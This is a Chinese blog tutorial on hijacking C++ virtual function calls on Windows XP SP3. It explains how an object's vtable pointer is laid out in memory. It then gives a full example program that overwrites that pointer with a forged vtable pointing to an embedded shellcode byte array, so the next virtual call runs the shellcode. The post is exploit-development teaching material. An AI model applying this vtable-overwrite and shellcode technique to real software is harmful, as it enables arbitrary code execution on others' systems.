攻击C++虚函数

最新推荐文章于 2022-10-09 20:30:27 发布
最新推荐文章于 2022-10-09 20:30:27 发布
阅读量929 收藏 2
点赞数
分类专栏: pwn C/C++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19683651/article/details/79357405
版权
pwn 同时被 2 个专栏收录
7 篇文章 0 订阅
订阅专栏
C/C++
3 篇文章 0 订阅
订阅专栏

C++虚函数和类在内存中的位置关系
这里写图片描述

虚函数示例

/*
    标题:攻击C++虚函数
    操走系统:xp s3
    编辑器:vc6.0
*/

#include <iostream.h>
#include <windows.h>

class People{
public:
    People(char* m_id,char* m_name){
        strcpy(id,m_id);
        strcpy(name,m_name);
    }
    virtual void print(){
        cout<<"I am Person\n";
        cout<<"ID:\t"<<id<<endl;
        cout<<"Name:\t"<<name<<endl;
    }
    virtual void GetName(){
        cout<<"I am Person\n";
        cout<<"Name:\t"<<name<<endl;
    }
    char name[100];
    char id[100];
};

class Student:public People{
public:
    Student(char* m_id,char* m_name,char* m_grade):People(m_id,m_name){strcpy(grade,m_grade);}
    char grade[100];
    virtual void print(){
        cout<<"I am student . [ID] "<<id<< "\t[Name]"<<name<<endl;
        GetName();
    }
    virtual void GetName(){
        cout<<"I am Student and my name is\t"<<name<<endl;
    }
};

int main(int argc,char** argv){
    Student s("0001","ysy","12");
    s.print();
    return 0;
}

分析

c++初始化一个含有虚函数的类student,返回值为0x12fe48,查看对应内存,前四个字节为虚表地址,后面接name和id这两个成员变量。

这里写图片描述
查看地址为0x428038的虚表,是两个虚函数的地址,ida在这边已经识别出来了。
这里写图片描述

如何利用

相比xp s2,在xp s3上,虚函数攻击会有所不同,可以发现在Student类中print这个虚函数里面再去调用GetName这个虚函数,就会使用到虚表,直接修改类中虚表地址,从而达到控制eip的目的,而且在一定情况下可以突破GS。
0x401450:将类的地址赋值给edx,也就是edx指向类中虚表指针
0x401453:将虚表地址赋值给eax,也就是获取虚表地址
0x40145a:获取虚表中第二个虚函数地址,也就是之前的GetName的地址
这里写图片描述

利用示例

直接构造一个虚表,然后将新的虚表地址覆盖类中的虚表指针

/*
    标题:攻击C++虚函数
    操走系统:xp s3
    编辑器:vc6.0
*/

#include <iostream.h>
#include <windows.h>
char shellcode[]="\x90\x90\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\xbb\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xd2\x64\x8b\x5a\x30\x8b\x4b\x0c\x8b\x49\x1c\x8b\x09\x8b\x69\x08\xad\x3d\x6a\x0a\x38\x1e\x75\x05\x95\xff\x57\xf8\x95\x60\x8b\x45\x3c\x8b\x4c\x05\x78\x03\xcd\x8b\x59\x20\x03\xdd\x33\xff\x47\x8b\x34\xbb\x03\xf5\x99\x0f\xbe\x06\x3a\xc4\x74\x08\xc1\xca\x07\x03\xd0\x46\xeb\xf1\x3b\x54\x24\x1c\x75\xe4\x8b\x59\x24\x03\xdd\x66\x8b\x3c\x7b\x8b\x59\x1c\x03\xdd\x03\x2c\xbb\x95\x5f\xab\x57\x61\x3d\x6a\x0a\x38\x1e\x75\xa9\x33\xdb\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6c\x8b\xc4\x53\x50\x50\x53\xff\x57\xfc\x53\xff\x57\xf8\x90\x90\x90";

void test(){
    cout<<"test\n";
}
class People{
public:
    People(char* m_id,char* m_name){
        strcpy(id,m_id);
        strcpy(name,m_name);
    }
    virtual void print(){
        cout<<"I am Person\n";
        cout<<"ID:\t"<<id<<endl;
        cout<<"Name:\t"<<name<<endl;
    }
    virtual void GetName(){
        cout<<"I am Person\n";
        cout<<"Name:\t"<<name<<endl;
    }
    char name[100];
    char id[100];
};

class Student:public People{
public:
    Student(char* m_id,char* m_name,char* m_grade):People(m_id,m_name){strcpy(grade,m_grade);}
    char grade[100];
    virtual void print(){
        cout<<"I am student . [ID] "<<id<< "\t[Name]"<<name<<endl;
        GetName();
    }
    virtual void GetName(){
        cout<<"I am Student and my name is\t"<<name<<endl;
    }
};

int main(int argc,char** argv){
    int new_vftable[2];
    new_vftable[0]=(int)&test;
    new_vftable[1]=(int)&shellcode;
    Student s("0001","ysy","12");
    *(int*)&s=(int)&new_vftable;
    s.print();
    return 0;
}
浅浅徘徊
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C++虚函数
清浅
04-16 390
1 多态的实现需要使用引用或者指针 1.1 指针和引用是实现多态的必要条件 EG: #include <iostream> using namespace std; class Base { public: virtual void func() { cout << "Base" << endl; } }; class Son:public...
攻击C++虚函数
PwnGuo的博客
09-17 1012
例题为:0day安全:软件漏洞分析技术(第二版) 虚函数入口地址被统一存在虚中,对象使用虚函数时通过调用虚指针找到虚,然后从虚中取出最终的函数入口地址进行掉用,虚指针保存在内存空间中,紧接着虚指针的时其他成员变量,虚函数只有通过对象指针的引用才能显示出其动态调用特性。 虚函数实现 通过对象中的成员变量溢出修改对象中的虚指针或修改需虚函数指针,程序调用虚函数时就会执行指定地...
函数指针还是c++虚函数_针对c++虚函数攻击
weixin_39686048的博客
11-28 191
文章首发于个人博客(song-10.gitee.io)c++虚函数虚函数这个名词有印象,但是完全忘记了干啥用的,所以还是回头来看看c++…..简单的说虚函数就是父类的指针调用子类的函数,大致过程如下图:虚函数执行流程根据上图还是可以比较直观的看到,虚函数调用实际上是通过存储在类实例化后分配的内存区域的“头部”存放了指向虚函数的指针,调用虚函数时先通过这个虚指针定位到虚,然后再取虚...
C++入门实现黑客攻击系统(准备工作)
m0_65635427的博客
05-21 8062
分析项目需求 黑客打开这个攻击系统后,首先看到的就是一个“功能菜单”。 以便让黑客选择所需要的功能。 假设需求如下: 1.网站404攻击 2.网站篡改攻击 3.网站攻击记录 4.DNS攻击 5.服务器重启攻击 项目实现 创建一个空项目CP1 添加文件admin.c #include <iostream> #include <Windows.h> /*1.网站404攻击 2.网站篡改攻击 3.网站攻击记录 4.DNS攻击 5.服务器重启攻击*/ int m
C++黑客攻击系统-功能实现、优化系统
xiaov_sen的博客
05-23 1641
“功实现 莫非实现 ”攻击?“ “小森 “非也非也,只是模拟而已 “小程 “如何模拟攻击呢”小森 “使用函数啦”小程 “那函数能干什么?”小森 “这个嘛…有了 ” 小程 “这么跟你说吧:函数就是功能, 比如说你想实现一个加法 运算。” “num1 + num2 这样有错吗”,“没有错,但是不能复用性 ”小程 “复用性?”小森 “你想想 如果这个重复的复制,代码是不是很傻, ”小程 “确实有点…”小森 "所以加法运算 是一个功能 “小程 加法函数: int Add(int leftNum,int righ
逆向基础(三)--- IDA中的虚函数
移动(IoT)安全
07-20 2662
这片文章(C++中的多态及实现原理(虚函数))阐述了多态的使用以及利用虚函数实现多态的原理,主要是从正向侧说明。我们在逆向过程中也会经常遇到虚函数的使用,在逆向中,在IDA中,虚函数又是什么样子的呢? 本文实例代码: /* C++多态测试实例 */ #include <string> #include <iostream> using namespace std; //基类 class Base { public: virtual void vfunc1() {
网络渗透--《C++中溢出覆盖虚函数指针技术》
06-10
C++中溢出覆盖虚函数指针技术》是一份深入探讨网络安全中漏洞利用的专题文档,主要关注C++编程语言中的一个特定安全问题:缓冲区溢出导致的虚函数指针覆盖。在这个主题中,我们将详细解析这个问题的原理、危害以及...
C++RPG小游戏代码
04-16
这是一个虚函数,用于显示角色的信息。`sol`类和`rab`类分别重写了这个函数,以适应各自角色的具体信息展示需求。 ### 三、角色类分析 #### 1. `base`类 这是所有角色的基类,定义了角色的基本属性和通用行为。 #...
TerrariaCPP:在 C++ 中的 OOP 工作
06-23
例如,攻击行为对于不同的角色或怪物可能有不同的实现,这就需要接口或者虚函数来实现多态性。 4. 模板与泛型编程:在C++中,模板和泛型编程可以提供类型无关的代码,增加代码的灵活性。"TerrariaCPP"可能使用模板...
C++程序设计-封装、继承多态应用示例
05-09
C++中,多态主要通过虚函数(virtual)实现。一个基类指针可以指向其派生类的对象,调用虚函数时,会根据实际的对象类型动态绑定到相应的方法。例如,`Dragon`和`Fighter`可能都有一个虚函数`attack()`, 不同的...
C++终端文字游戏
08-17
在游戏中,`Character`类可以定义一个虚函数`attack()`,各个子类如`Player`和`Monster`可以根据自身特点重写这个函数,实现不同的攻击效果。通过指针或引用来调用`attack()`,就能实现多态性,使得代码更加灵活和可...
12.IDA-虚函数和虚
积累点滴,保持自我
08-04 2635
vtable 编译器会为每一个包含虚函数的类(或通过继承得到的子类)生成一个,其中包含指向类中每一个虚函数的指针,这样的就叫做虚(vtable) __vfptr 每个包含虚函数的类对象都获得__vfptr指针,并且是对象的第一个数据成员 编译器必须要保证虚函数的指针存在于对象实例中最前面的位置 在计算对象的总大小时,也必须考虑到虚指针。比如new,传递给
C++虚函数、虚指针和虚详解
bob的博客
09-28 5163
关于虚函数的背景知识 用virtual关键字申明的函数叫做虚函数虚函数肯定是类的成员函数。 存在虚函数的类都有一个一维的虚函数叫做虚。每一个类的对象都有一个指向虚开始的虚指针。虚是和类对应的,虚指针是和对象对应的。 多态性是一个接口多种实现,是面向对象的核心。分为编译多态性和运行多态性。 运行多态用虚函数来实现,结合动态绑定。 纯虚函数虚函数再加上=0。并且该函数只有声明,没有实现。 抽象类是指包括至少一个纯虚函数的类。 详细原理: 编译器在编译的时候,发现Base类中有虚函数,此时编译器
虚函数的工作原理
qq_41727218的博客
02-26 538
    虚函数(Virtual Function)是通过一张虚函数(Virtual Table)来实现的。编译器必需要保证虚函数的指针存在于对象实例中最前面的位置(这是为了保证正确取到虚函数的偏移量)。     每当创建一个包含有虚函数的类或从包含有虚函数的类派生一个类时,编译器就会为这个类创建一个虚函数(VTABLE)保存该类所有虚函数的地址,在每个带有虚函数的类 中,编译器秘密地置入一...
实践SEH攻击虚函数攻击
houjingyi的博客
01-25 3309
试验工具:ollydbg(思考题程序见附件) 实验环境:windows2000虚拟机 1.目标 (1)了解SEH攻击虚函数攻击的基本原理。 (2)通过调试SEH攻击代码,理解Windows异常处理机制,掌握针对SEH的攻击方式,并利用OllyDbg跟踪异常状态。 (3)调试虚函数攻击代码,理解虚函数工作机制与内存分布方式,掌握基本的虚函数攻击与计算方式,并可以用OllyDbg追踪。
6 攻击C++虚函数
最新发布
qq_55202378的博客
10-09 448
虚函数
double free
浅浅徘徊的博客
03-16 6641
漏洞原理 Double Free其实就是一种在free时利用伪造chunk并且欺骗操作系统,达到修改内存的目的。 基本知识点 先大概说下基本知识。 不管是在正在使用的还是释放的chunk,其数据结构是差不多一样的,差别在于prev_size、’fd’和’bk’,prev_size只有前一个chunk是free状态才会放置其大小,后两个只有当前chunk是free状态才会有,不然只会存放数...
虚函数与SEH攻击详解:动态调用与安全漏洞
"本文将深入探讨虚函数攻击与结构化异常处理(SEH)攻击,主要针对C++中的虚函数机制及其在安全领域的利用。文章适合对C++有一定基础,希望通过实验步骤学习这两种攻击方式的读者。" 在C++编程语言中,虚函数是实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值